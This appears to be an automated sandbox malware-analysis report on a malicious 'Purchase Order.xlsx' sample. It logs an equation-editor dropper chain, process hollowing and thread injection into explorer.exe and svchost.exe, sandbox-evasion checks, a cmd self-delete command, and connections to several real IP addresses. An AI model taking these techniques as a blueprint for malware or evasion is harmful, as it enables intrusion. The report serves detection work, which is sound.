          Source: C:\Users\Public\vbc.exeCode function: 4_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_00403461
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040473E GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,4_2_0040473E
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C34148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,5_2_00C34148
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040216B CoCreateInstance,MultiByteToWideChar,4_2_0040216B
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C3443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,5_2_00C3443D
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Purchase Order.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD39.tmpJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Purchase Order.xlsxReversingLabs: Detection: 23%
          Source: acqyswhf.exeString found in binary or memory: The device has succeeded a query-stop and its resource requirements have changed.
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p
          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p
          Source: unknownProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.pJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeProcess created: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.pJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe'Jump to behavior
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
          Source: Purchase Order.xlsxStatic file information: File size 2507264 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: acqyswhf.exe, dtz25z5e9sr.exe, svchost.exe
          Source: Binary string: svchost.pdb source: dtz25z5e9sr.exe, 00000006.00000002.2204947224.00000000002C4000.00000004.00000020.sdmp
          Source: Purchase Order.xlsxInitial sample: OLE indicators vbamacros = False
          Source: Purchase Order.xlsxInitial sample: OLE indicators encrypted = True

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeUnpacked PE file: 6.2.dtz25z5e9sr.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00BE4B77 LoadLibraryA,GetProcAddress,5_2_00BE4B77
          Source: vbc.exe.2.drStatic PE information: real checksum: 0x0 should be: 0xcb8fe
          Source: scancopy87867678[1].exe.2.drStatic PE information: real checksum: 0x0 should be: 0xcb8fe
          Source: dtz25z5e9sr.exe.5.drStatic PE information: real checksum: 0xdf890 should be: 0xe835e
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00418855 push cs; iretd 6_2_0041885C
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_004070C8 push ecx; retf 6_2_004070CE
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_0040BACC push esp; retf 6_2_0040BACD
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_004092E8 push cs; iretd 6_2_004092ED
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_004162B3 push esp; retf 6_2_004162CF
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_0041B3C5 push eax; ret 6_2_0041B418
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_0041B47C push eax; ret 6_2_0041B482
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_0041B412 push eax; ret 6_2_0041B418
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_0041B41B push eax; ret 6_2_0041B482
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_0041CF7F push es; iretd 6_2_0041CF80
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_0041CFC2 push dword ptr [ebp-4DC2E796h]; iretd 6_2_0041CFD0
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BEDFA1 push ecx; ret 6_2_00BEDFB4
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_004070C8 push ecx; retf 6_1_004070CE
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_004092E8 push cs; iretd 6_1_004092ED
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_004162B3 push esp; retf 6_1_004162CF
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_0041B3C5 push eax; ret 6_1_0041B418
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_0041B47C push eax; ret 6_1_0041B482
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_0041B412 push eax; ret 6_1_0041B418
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_0041B41B push eax; ret 6_1_0041B482
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_00418855 push cs; iretd 6_1_0041885C
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_0040BACC push esp; retf 6_1_0040BACD
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_0041CF7F push es; iretd 6_1_0041CF80
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_0041CFC2 push dword ptr [ebp-4DC2E796h]; iretd 6_1_0041CFD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0085DFA1 push ecx; ret 10_2_0085DFB4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0009C04B push ss; iretd 10_2_0009C04E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_000870C8 push ecx; retf 10_2_000870CE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_000962B3 push esp; retf 10_2_000962CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_000892E8 push cs; iretd 10_2_000892ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0009B3C5 push eax; ret 10_2_0009B418
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0009B41B push eax; ret 10_2_0009B482
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0009B412 push eax; ret 10_2_0009B418
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeFile created: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\scancopy87867678[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00BE5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_00BE5EDA
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00BF33B7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_00BF33B7
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: Purchase Order.xlsxStream path 'EncryptedPackage' entropy: 7.99991439785 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 00000000000885F4 second address: 00000000000885FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 000000000008898E second address: 0000000000088994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C60501 rdtsc 5_3_03C60501
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2332Thread sleep time: -360000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 2992Thread sleep time: -45000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exe TID: 752Thread sleep time: -38000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_004059F0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040659C FindFirstFileA,FindClose,4_2_0040659C
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004027A1 FindFirstFileA,4_2_004027A1
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C34005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00C34005
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C3C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00C3C2FF
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00BE5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,5_2_00BE5D13
          Source: explorer.exe, 00000008.00000000.2183457068.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000008.00000002.2380246315.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.2183832262.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: explorer.exe, 00000008.00000000.2183457068.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.2180947602.00000000002CD000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 00000008.00000002.2380274891.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C60501 rdtsc 5_3_03C60501
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00409B30 LdrLoadDll,6_2_00409B30
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C445D5 BlockInput,5_2_00C445D5
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00BE5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,5_2_00BE5240
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00BE4B77 LoadLibraryA,GetProcAddress,5_2_00BE4B77
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C22AF8 mov eax, dword ptr fs:[00000030h]5_3_03C22AF8
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BF26F8 mov eax, dword ptr fs:[00000030h]6_2_00BF26F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008626F8 mov eax, dword ptr fs:[00000030h]10_2_008626F8
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C288CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,5_2_00C288CD
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00BFA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00BFA385
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00BFA354 SetUnhandledExceptionFilter,5_2_00BFA354

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 103.209.233.78 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.47.75 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 23.228.109.141 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 81.17.18.195 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 50.87.169.249 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 208.92.209.208 80Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeThread register set: target process: 1388Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 1388Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeSection unmapped: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe base address: 400000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: B60000Jump to behavior
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeMemory written: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe base: 7EFDE008Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00BE5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,5_2_00BE5240
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00BE5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_00BE5EDA
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.pJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeProcess created: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.pJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe'Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C288CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,5_2_00C288CD
          Source: vbc.exe, 00000004.00000002.2182138412.0000000002826000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp, dtz25z5e9sr.exe, 00000006.00000000.2164172039.00000000004B6000.00000002.00020000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: explorer.exe, 00000008.00000000.2172476527.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: acqyswhf.exe, explorer.exe, 00000008.00000000.2172476527.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000002.2380246315.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
